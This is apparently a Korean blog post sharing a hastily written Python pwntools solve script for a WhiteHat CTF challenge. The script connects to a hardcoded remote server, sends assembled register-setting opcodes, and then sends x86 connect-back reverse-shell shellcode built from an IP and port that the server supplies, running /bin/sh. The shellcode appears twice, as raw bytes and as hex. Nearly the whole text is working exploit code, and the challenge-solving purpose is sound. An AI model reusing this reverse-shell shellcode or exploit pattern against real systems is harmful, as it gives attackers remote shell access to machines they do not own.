whitehat cft 문제

whitehat cft 문제

급하게 짜느라고 소스는 엉망이지만 , 나중을 위해 기록^^

from pwn import *
from re import findall
from subprocess import check_output


c = remote("121.78.147.159", 55511)

r = c.recvuntil("input Opcode")

print r
code = ""
i=0

eax = 0xeb172f5b
ebx = 0x5be4d5fa
ecx = 0x8aabb74e
edx = 0xca568210
esp = 0xb0a6bd97
ebp = 0x2044ada2
esi = 0xefc7fe7a
edi = 0x6f9d6a62


for s in findall(".{3} = 0x.{0,8}", r):
   s = s.split("=")


   if i == 0 :
       eax = int(s[1],16)
   elif i == 1 :
       ebx = int(s[1],16)
   elif i == 2 :
       ecx = int(s[1],16)
   elif i == 3 :
       edx = int(s[1],16)
   elif i == 4 :
       esp = int(s[1],16)
   elif i == 5 :
       ebp = int(s[1],16)
   elif i == 6 :
       esi = int(s[1],16)
   elif i == 7 :
       edi = int(s[1],16)

   i = i +1

ex = ""
ex += asm('mov eax, 0x%x'%eax).encode('hex')
ex += asm('mov ebx, 0x%x'%ebx).encode('hex')
ex += asm('mov ecx, 0x%x'%ecx).encode('hex')
ex += asm('mov edx, 0x%x'%edx).encode('hex')
ex += asm('mov esp, 0x%x'%esp).encode('hex')
ex += asm('mov ebp, 0x%x'%ebp).encode('hex')
ex += asm('mov esi, 0x%x'%esi).encode('hex')
ex += asm('mov edi, 0x%x'%edi).encode('hex')
ex += '\n\n'

print ex

c.send(ex)


while True:
    try:
#        print "aaa"
         data =  c.recv()
         #print data
#        print data.encode('hex')
         break
    except:
        break


r = c.recvuntil("input Opcode")
print r
print "----"



p = r.find('0x') 

push3 = int(r[p:p+10].strip(),16)
print "push 3 = " + r[p:p+10]


p = r.find('0x',p+10,len(r)) 
push2 =  int(r[p:p+10].strip(),16)
print "push 2 = " + r[p:p+10]

p = r.find('0x',p+10,len(r)) 
push1 =  int(r[p:p+10].strip(),16)
print "push 1 = " + r[p:p+10]

# sub = esp, 0xc
ex = ""
ex += asm('add esp,0xc').encode('hex')
ex += asm('push 0x%x'%push1).encode('hex')
ex += asm('push 0x%x'%push2).encode('hex')
ex += asm('push 0x%x'%push3).encode('hex')
ex += '\n\n'

print ex
c.send(ex)

r = c.recvuntil("/bin/sh")
print "----"

print r


p = r.find(':') 
ip = r[p+1:p+16].strip()

print "\n"
print "ip address = " + ip


p = r.find(':' , p+16, len(r)) 
port = r[p+1:p+8].strip()
print "\n"
print "port = " + port

p = r.find(':' , p+8, len(r)) 
shell = r[p+1:p+10].strip()
print "\n"
print "shell = " + shell


h = socket.inet_aton(ip).encode("hex")

ip1 = h[0:2]
ip2 = h[2:4]
ip3 = h[4:6] 
ip4 = h[6:8] 
		
print h[0:2],h[2:4],h[4:6],h[6:8]

i = socket.htons( int(port) )
hexdig = "%x" % i
p = hexdig.zfill(4)

port1 = p[0:2]
port2 = p[2:4]
print p[0:2],p[2:4]
		
'''
shell = "\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"

shell += ip1 + ip2 + ip3 + ip4
shell += "\x66\x68" 
shell += port2 + port1
shell+="\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

shell+="\n\n"
'''


shell = "6a66589952425289d3425289e1cd809389d1b03fcd804979f9b06687da68"

shell += ip1 + ip2 + ip3 + ip4
shell += "6668"
shell += port2 + port1
shell+="66534389e16a10515289e1cd806a0b589989d152682f2f7368682f62696e89e3cd80"

shell+="\n\n"
print shell



c.send(shell)

while True:
    try:
#        print "aaa"
         data =  c.recv()
         print data
#        print data.encode('hex')
    except:
        break


c.close()
print "done!"